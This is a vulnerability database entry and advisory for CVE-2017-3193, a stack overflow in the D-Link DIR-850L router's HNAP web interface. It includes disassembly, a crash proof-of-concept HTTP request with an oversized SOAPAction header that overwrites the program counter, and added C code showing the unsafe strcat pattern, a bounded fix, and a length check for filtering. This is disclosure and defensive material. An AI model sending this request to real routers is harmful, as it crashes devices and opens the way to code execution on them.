CVE-2017-3193 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in D-Link DIR-850L Firmware 1.14B07/2.07.B05
Attack vector: ADJACENT_NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: HIGH
Integrity impact: HIGH
Availability impact: HIGH
Summary
Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
OS | | 2 |
Hardware | | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables: This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Overflow Buffers: Buffer overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attacker's choice.
- Client-side Injection-induced Buffer Overflow: This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
- Filter Failure through Buffer Overflow: In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow), hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
- MIME Conversion: An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME-compatible format and back.
Seebug
Field | Value |
---|---|
bulletinFamily | exploit |
id | SSV:92825 |
last seen | 2017-11-19 |
modified | 2017-03-26 |
published | 2017-03-26 |
reporter | Root |
title | D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow (CVE-2017-3193) |

Description:

The affected service is the management web, in the cgibin file located within the htdocs folder on the router filesystem. The vulnerability is a stack-based buffer overflow, caused by a non-controlled use of the strcat() function that allows an overwrite of the PC, and thus the execution flow of the program, allowing arbitrary code execution.

The call to strcat that is causing the buffer overflow is located at the offset 0x414a20. Of the arguments passed to strcat, the first (destination) corresponds to the second part of the HNAP_AUTH header, and the second (source) corresponds to the content of the SOAPAction header. If the size of the content of the SOAPAction plus the second part of the HNAP_AUTH header is more than 547 bytes, it will overflow and the following 4 overwritten bytes will correspond to the stored PC.

```
0x00414130 8f998410 lw t9, -0x7bf0(gp)      ; [0x43ad50:4]=0x4251e0 sym.imp.getenv
0x00414134 0320f809 jalr t9
0x00414138 24847dac addiu a0, a0, 0x7dac    ; HTTP_SOAPACTION
0x0041413c 3c040042 lui a0, 0x42
0x00414140 8fbc0020 lw gp, 0x20(sp)
0x00414144 2484615c addiu a0, a0, 0x615c
0x00414148 8f998410 lw t9, -0x7bf0(gp)      ; [0x43ad50:4]=0x4251e0 sym.imp.getenv
0x0041414c 0320f809 jalr t9
0x00414150 00408821 move s1, v0             ; HTTP_SOAPACTION saved to s1
...
0x00414a14 02402021 move a0, s2             ; arg1 (dest)
0x00414a18 8fbc0020 lw gp, 0x20(sp)
0x00414a1c 8f9982b0 lw t9, -0x7d50(gp)      ; [0x43abf0:4]=0x4253e0 sym.imp.strcat
0x00414a20 0320f809 jalr t9                 ; Call to strcat
0x00414a24 02202821 move a1, s1             ; arg2 (src)
```

The following request is a proof of concept that will cause the process to crash, by overwriting the PC with the value 0x41414141. Note that the following is a modification of a legitimate request and that not all the headers are necessary to cause the crash.

```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAA
HNAP_AUTH: BBD0605AF8690024AF8568BE88DD7B8E 1482588069
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.1/info/Login.html
Content-Length: 306
Cookie: uid=kV8BSOXCoc
Connection: close
```
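The description above boils down to one unchecked strcat() of attacker-controlled header text into a fixed stack buffer. The C below is an added illustration written for this page; it is not the cgibin code from the firmware and not the advisory's own code. It shows the unsafe shape next to a bounded replacement, plus a request-level length check a proxy or IDS rule could apply using the 547-byte limit the advisory gives. The buffer size HNAP_BUF_SIZE, the assumption that HNAP_AUTH is "<hash> <second-part>" split at the first space, and the sample SOAPAction value "GetDeviceSettings" are assumptions made for the example; the HNAP_AUTH value is copied from the advisory's PoC request.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed for the demo: the advisory says the overflow starts past 547 bytes,
 * so a buffer of 547 characters plus the terminating NUL is used here. */
#define HNAP_OVERFLOW_LIMIT 547
#define HNAP_BUF_SIZE (HNAP_OVERFLOW_LIMIT + 1)

/* The unsafe shape the advisory describes (reconstruction, not firmware code):
 * a fixed stack buffer already holding the second HNAP_AUTH field, then
 * strcat() of the SOAPAction value with no bound. Only ever called with short
 * inputs here; a longer pair would write past buf and into the saved PC. */
size_t unsafe_concat(const char *auth_second_part, const char *soap_action)
{
    char buf[HNAP_BUF_SIZE];
    strcpy(buf, auth_second_part);   /* no check against sizeof buf */
    strcat(buf, soap_action);        /* same shape as the call at 0x414a20 */
    return strlen(buf);
}

/* Bounded replacement: refuses the pair when it would not fit, and leaves
 * the output buffer untouched in that case so the caller can fail closed. */
bool build_hnap_auth_string(char *out, size_t out_len,
                            const char *auth_second_part, const char *soap_action)
{
    size_t a = strlen(auth_second_part);
    size_t s = strlen(soap_action);
    if (a + s >= out_len)            /* >= keeps room for the NUL */
        return false;
    memcpy(out, auth_second_part, a);
    memcpy(out + a, soap_action, s + 1);
    return true;
}

/* Request-level check for a filtering proxy or IDS rule: true when the
 * SOAPAction length plus the second HNAP_AUTH field length exceeds the limit.
 * Assumes HNAP_AUTH is "<hash> <second-part>"; with no space the second part
 * is treated as empty. */
bool hnap_request_is_oversized(const char *hnap_auth_header, const char *soap_action_header)
{
    const char *sp = strchr(hnap_auth_header, ' ');
    size_t second_len = sp ? strlen(sp + 1) : 0;
    return second_len + strlen(soap_action_header) > HNAP_OVERFLOW_LIMIT;
}

/* Builds a constructed request with a SOAPAction of soap_len 'X' characters and
 * the HNAP_AUTH value from the advisory's PoC (second field is 10 characters),
 * then runs the oversize check on it. */
bool check_synthetic_request(size_t soap_len)
{
    char soap[1024];
    if (soap_len >= sizeof soap)
        soap_len = sizeof soap - 1;
    memset(soap, 'X', soap_len);
    soap[soap_len] = '\0';
    return hnap_request_is_oversized("BBD0605AF8690024AF8568BE88DD7B8E 1482588069", soap);
}

/* Exercises the bounded builder: a normal pair is accepted, an oversized pair
 * is rejected and the buffer keeps its previous contents. */
bool demo_bounded_build(void)
{
    char out[HNAP_BUF_SIZE];
    char big[2048];
    memset(big, 'X', sizeof big - 1);
    big[sizeof big - 1] = '\0';

    bool ok_small = build_hnap_auth_string(out, sizeof out, "1482588069", "GetDeviceSettings")
                    && strcmp(out, "1482588069GetDeviceSettings") == 0;
    bool rejected_big = !build_hnap_auth_string(out, sizeof out, "1482588069", big)
                        && strcmp(out, "1482588069GetDeviceSettings") == 0;
    return ok_small && rejected_big;
}

int main(void)
{
    printf("short pair via unsafe shape: %zu bytes\n",
           unsafe_concat("1482588069", "GetDeviceSettings"));
    printf("bounded builder behaves: %s\n", demo_bounded_build() ? "yes" : "no");
    printf("537 X's oversized: %s\n", check_synthetic_request(537) ? "yes" : "no");
    printf("538 X's oversized: %s\n", check_synthetic_request(538) ? "yes" : "no");
    return 0;
}
```

The threshold in check_synthetic_request flips between 537 and 538 filler bytes because the PoC's second HNAP_AUTH field contributes 10 bytes of its own; a filter that only measures SOAPAction in isolation would miss the combined-length condition the advisory describes.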
References
- http://www.securityfocus.com/bid/96747
- https://tools.cisco.com/security/center/viewAlert.x?alertId=52967
- https://twitter.com/NCCGroupInfosec/status/845269159277723649
- https://www.kb.cert.org/vuls/id/305448
- https://www.nccgroup.trust/uk/our-research/d-link-dir-850l-web-admin-interface-vulnerable-to-stack-based-buffer-overflow/?research=Technical+advisories